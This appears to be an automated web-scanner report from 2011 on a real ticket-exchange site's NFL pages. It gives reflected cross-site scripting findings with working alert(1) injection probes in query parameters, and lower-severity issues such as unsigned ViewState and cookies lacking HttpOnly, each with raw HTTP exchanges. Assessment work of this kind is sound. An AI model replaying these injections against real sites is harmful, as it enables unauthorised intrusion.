1. Cross-site scripting (reflected)
1.2. http://www.ticketexchangebyticketmaster.com/NFL/ [partnerCode parameter]
2. ASP.NET ViewState without MAC enabled
2.1. http://www.ticketexchangebyticketmaster.com/NFL/
2.2. http://www.ticketexchangebyticketmaster.com/NFL/default.aspx
3. Cookie without HttpOnly flag set
3.1. http://www.ticketexchangebyticketmaster.com/NFL/
3.2. http://www.ticketexchangebyticketmaster.com/NFL/default.aspx
4. Cross-domain Referer leakage
5. Cross-domain script include
5.1. http://www.ticketexchangebyticketmaster.com/NFL/
5.2. http://www.ticketexchangebyticketmaster.com/NFL/default.aspx
Severity: | High |
Confidence: | Certain |
Host: | http://www.ticketexc |
Path: | /NFL/ |
GET /NFL/?7d859"-alert(1)- Host: www.ticketexchangeby Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 03 Jun 2011 01:27:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: TNOW3SessionCookie Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46128 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="hdTicketExchange"> ...[SNIP]... rtist_team = ""; dtmTag.dtmc_location = ""; dtmTag.dtmc_venue = ""; dtmTag.dtmc_event_date = ""; dtmTag.dtmc_source = "Direct"; dtmTag.dtmc_url = "http://www.ticketex /* custom fields end */ dtmTag.dtmc_ref = document.referrer; for (var item in dtmTag){ if(typeof dtmTag[item] != "function" && typeof dtmTag[item] != "object") dtmSrc += "&" + item + "=" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ticketexc |
Path: | /NFL/ |
GET /NFL/?partnerCode=16068f9f95"-alert(1)- Host: www.ticketexchangeby Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 03 Jun 2011 01:27:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: TNOW3SessionCookie Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46261 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="hdTicketExchange"> ...[SNIP]... dtmTag.dtmc_location = ""; dtmTag.dtmc_venue = ""; dtmTag.dtmc_event_date = ""; dtmTag.dtmc_source = "Unknown"; dtmTag.dtmc_url = "http://www.ticketex /* custom fields end */ dtmTag.dtmc_ref = document.referrer; for (var item in dtmTag){ if(typeof dtmTag[item] != "function" && typeof dtmTag[item] != "object") dtmSrc += "&" + item + "=" + ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ticketexc |
Path: | /NFL/default.aspx |
GET /NFL/default.aspx?7ef9f"-alert(1)- Host: www.ticketexchangeby Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 03 Jun 2011 01:27:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: TNOW3SessionCookie Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46192 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="hdTicketExchange"> ...[SNIP]... ""; dtmTag.dtmc_location = ""; dtmTag.dtmc_venue = ""; dtmTag.dtmc_event_date = ""; dtmTag.dtmc_source = "Direct"; dtmTag.dtmc_url = "http://www.ticketex /* custom fields end */ dtmTag.dtmc_ref = document.referrer; for (var item in dtmTag){ if(typeof dtmTag[item] != "function" && typeof dtmTag[item] != "object") dtmSrc += "&" + item + "=" ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.ticketexc |
Path: | /NFL/ |
GET /NFL/ HTTP/1.1 Host: www.ticketexchangeby Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 03 Jun 2011 01:27:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: TNOW3SessionCookie Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45996 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="hdTicketExchange"> ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg0NjEwODI2 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.ticketexc |
Path: | /NFL/default.aspx |
GET /NFL/default.aspx HTTP/1.1 Host: www.ticketexchangeby Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 03 Jun 2011 01:27:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: TNOW3SessionCookie Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46056 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="hdTicketExchange"> ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg0NjEwODI2 ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.ticketexc |
Path: | /NFL/ |
GET /NFL/ HTTP/1.1 Host: www.ticketexchangeby Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 03 Jun 2011 01:27:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: TNOW3SessionCookie Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45996 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="hdTicketExchange"> ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.ticketexc |
Path: | /NFL/default.aspx |
GET /NFL/default.aspx HTTP/1.1 Host: www.ticketexchangeby Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 03 Jun 2011 01:27:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: TNOW3SessionCookie Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46056 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="hdTicketExchange"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ticketexc |
Path: | /NFL/ |
GET /NFL/?partnerCode=16068 HTTP/1.1 Host: www.ticketexchangeby Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 03 Jun 2011 01:27:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: TNOW3SessionCookie Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 48013 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="hdTicketExchange"> ...[SNIP]... </title><link rel="stylesheet" href="http://static.nfl <script type="text/javascript"> ...[SNIP]... </script> <script src="http://static.nfl type="text/javascript"> <script src="http://static.nfl type="text/javascript"> <script src="http://static.nfl <script src="http://static.nfl <script src="http://static.nfl <script src="http://static.nfl type="text/javascript"> ...[SNIP]... <meta name="msvalidate.01" content="961067BFAEA ...[SNIP]... <!-- End Dotomi Tag --><link rel="shortcut icon" href="http://content <link href="/UI/CSS/TNow3c <link href="http://content <link href="http://content <link href="http://content <script src="http://content <script src="http://content <script src="http://content <script src="http://content ...[SNIP]... <li id="link-mobile"><a href="http://www.nfl.com <li id="link-nflatino"><a href="http://www.nflatino ...[SNIP]... <h3> <a href="http://www.nfl.com ...[SNIP]... <li><a href="http://www.nfl.com ...[SNIP]... <li><a href="http://www.nfl.com ...[SNIP]... <li><a href="http://www.facebook ...[SNIP]... <li><a href="http://twitter.com ...[SNIP]... <li><a href="http://www.nfl.com ...[SNIP]... <li id="link-user-register"><a href="https://id2.s.nfl ...[SNIP]... <li id="link-user-sign-in"><a href="https://id2.s.nfl <li id="link-user-sign-out" style="display:none"><a href="https://id2.s.nfl ...[SNIP]... <li><a class="BUF" target="_blank" href="http://www ...[SNIP]... <li><a class="MIA" target="_blank" href="http://www ...[SNIP]... <li><a class="NE" target="_blank" href="http://www.patriots ...[SNIP]... <li><a class="NYJ" target="_blank" href="http://www ...[SNIP]... <li><a class="BAL" target="_blank" href="http://www ...[SNIP]... <li><a class="CIN" target="_blank" href="http://www.bengals ...[SNIP]... <li><a class="CLE" target="_blank" href="http://www ...[SNIP]... <li><a class="PIT" target="_blank" href="http://www.steelers ...[SNIP]... <li><a class="HOU" target="_blank" href="http://www ...[SNIP]... <li><a class="IND" target="_blank" href="http://www.colts ...[SNIP]... <li><a class="JAC" target="_blank" href="http://www.jaguars ...[SNIP]... <li><a class="TEN" target="_blank" href="http://www ...[SNIP]... <li><a class="DEN" target="_blank" href="http://www ...[SNIP]... <li><a class="KC" target="_blank" href="http://www.kcchiefs ...[SNIP]... <li><a class="OAK" target="_blank" href="http://www.raiders ...[SNIP]... <li><a class="SD" target="_blank" href="http://www.chargers ...[SNIP]... <li><a class="DAL" target="_blank" href="http://www ...[SNIP]... <li><a class="NYG" target="_blank" href="http://www.giants ...[SNIP]... <li><a class="PHI" target="_blank" href="http://www ...[SNIP]... <li><a class="WAS" target="_blank" href="http://www.redskins ...[SNIP]... <li><a class="CHI" target="_blank" href="http://www ...[SNIP]... <li><a class="DET" target="_blank" href="http://www ...[SNIP]... <li><a class="GB" target="_blank" href="http://www.packers ...[SNIP]... <li><a class="MIN" target="_blank" href="http://www.vikings ...[SNIP]... <li><a class="ATL" target="_blank" href="http://www ...[SNIP]... <li><a class="CAR" target="_blank" href="http://www.panthers ...[SNIP]... <li><a class="NO" target="_blank" href="http://www ...[SNIP]... <li><a class="TB" target="_blank" href="http://www ...[SNIP]... <li><a class="ARI" target="_blank" href="http://www ...[SNIP]... <li><a class="STL" target="_blank" href="http://www ...[SNIP]... <li><a class="SF" target="_blank" href="http://www.sf49ers ...[SNIP]... <li><a class="SEA" target="_blank" href="http://www.seahawks ...[SNIP]... L.COM..." name="query" style="background: #F0F0F0 none repeat scroll 0% 0%; text-align: right; vertical-align: top; border:0; margin-top:3px; height: 16px; width: 230px;"> <img id="hd-search-button" onmouseover="document onclick="redirectQuery(); src="http://static.nfl type="image"> ...[SNIP]... <div id="header-logo"> <a href="http://www.nfl.com/ </div> <!-- navigation goes here --> <script type="text/javascript" src="http://www.nfl.com ...[SNIP]... <p style="font:11px arial; margin-top:10px;">To see this content please go to <a href="http://www.adobe ...[SNIP]... <noscript> <a href="http://ad <img class="adImg" src="http://ad.doubl </a> ...[SNIP]... <br> <img src="http://content <a href="javascript:void(0) ...[SNIP]... <div class="padV10"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <br /> <a href="https://teamex Find Tickets »</a> ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="padV10"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <br /> <a href='https://teamex ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <br /> <a href="https://teamex Find Tickets »</a> ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div class="floatLeft teamLogo"> <img alt="" src="http://content ...[SNIP]... <div id="footer-logo"> <a href="http://www.nfl.com/ <img alt="NFL Logo" src="http://img.static ...[SNIP]... <li><a href="http://nflrush.com/ <a href="http://www.nflrush ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.nfl.com ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.nfl.com ...[SNIP]... <li><a href="http://www.nfl.com FAQ</a> ...[SNIP]... <li>Jobs: <a href="http://www.nfl href="http://footballjobs Team</a> ...[SNIP]... <li><a href="http://chalktalk target="_blank"> ...[SNIP]... <li><a href="http://www.nflshop target="_blank"> ...[SNIP]... <li><a href="http://www.nfl.com Media Kit (PDF)</a> ...[SNIP]... <li><a href="http://profoot ...[SNIP]... <li><a href="http://www.nfllabor ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://nflplayers ...[SNIP]... <li><a href="https://www ...[SNIP]... <li><a href="http://www.nfl.com ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.patriots ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.bengals ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.steelers ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.colts ...[SNIP]... <li><a href="http://www.jaguars ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.kcchiefs ...[SNIP]... <li><a href="http://www.raiders ...[SNIP]... <li><a href="http://www.chargers ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.giants ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.redskins ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.packers ...[SNIP]... <li><a href="http://www.vikings ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.panthers ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.sf49ers ...[SNIP]... <li><a href="http://www.seahawks ...[SNIP]... signs are registered trademarks of the teams indicated. All other NFL-related trademarks are trademarks of the National Football League. NFL footage © NFL Productions LLC. <a href="http://www.nfl.com style="color: #b6061e; font-weight:normal;"> style="color: #b6061e; font-weight:normal;"> ...[SNIP]... </div> <a rel="entry-content" href="http://www.nfl.com </a><a rel="bookmark" target="_blank" href="http://www.nfl.com" style="display: none;"> </a> ...[SNIP]... <div> <img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="https://statse </div> ...[SNIP]... </script><script language="javascript" src="http://track ...[SNIP]... </script> <img src="http://www ...[SNIP]... </script><script src='http://content ...[SNIP]... <!-- End SiteCatalyst Code --> <iframe src="http://switch.atdmt ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ticketexc |
Path: | /NFL/ |
GET /NFL/ HTTP/1.1 Host: www.ticketexchangeby Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 03 Jun 2011 01:27:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: TNOW3SessionCookie Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45996 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="hdTicketExchange"> ...[SNIP]... </script> <script src="http://static.nfl type="text/javascript"> <script src="http://static.nfl type="text/javascript"> <script src="http://static.nfl <script src="http://static.nfl <script src="http://static.nfl <script src="http://static.nfl type="text/javascript"> ...[SNIP]... <meta name="msvalidate.01" content="961067BFAEA ...[SNIP]... <link href="http://content <script src="http://content <script src="http://content <script src="http://content <script src="http://content ...[SNIP]... <!-- navigation goes here --> <script type="text/javascript" src="http://www.nfl.com ...[SNIP]... </noscript> <script language="javascript" src="http://track ...[SNIP]... </script><script src='http://content ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ticketexc |
Path: | /NFL/default.aspx |
GET /NFL/default.aspx HTTP/1.1 Host: www.ticketexchangeby Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 03 Jun 2011 01:27:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: TNOW3SessionCookie Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46056 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="hdTicketExchange"> ...[SNIP]... </script> <script src="http://static.nfl type="text/javascript"> <script src="http://static.nfl type="text/javascript"> <script src="http://static.nfl <script src="http://static.nfl <script src="http://static.nfl <script src="http://static.nfl type="text/javascript"> ...[SNIP]... <meta name="msvalidate.01" content="961067BFAEA ...[SNIP]... <link href="http://content <script src="http://content <script src="http://content <script src="http://content <script src="http://content ...[SNIP]... <!-- navigation goes here --> <script type="text/javascript" src="http://www.nfl.com ...[SNIP]... </noscript> <script language="javascript" src="http://track ...[SNIP]... </script><script src='http://content ...[SNIP]... |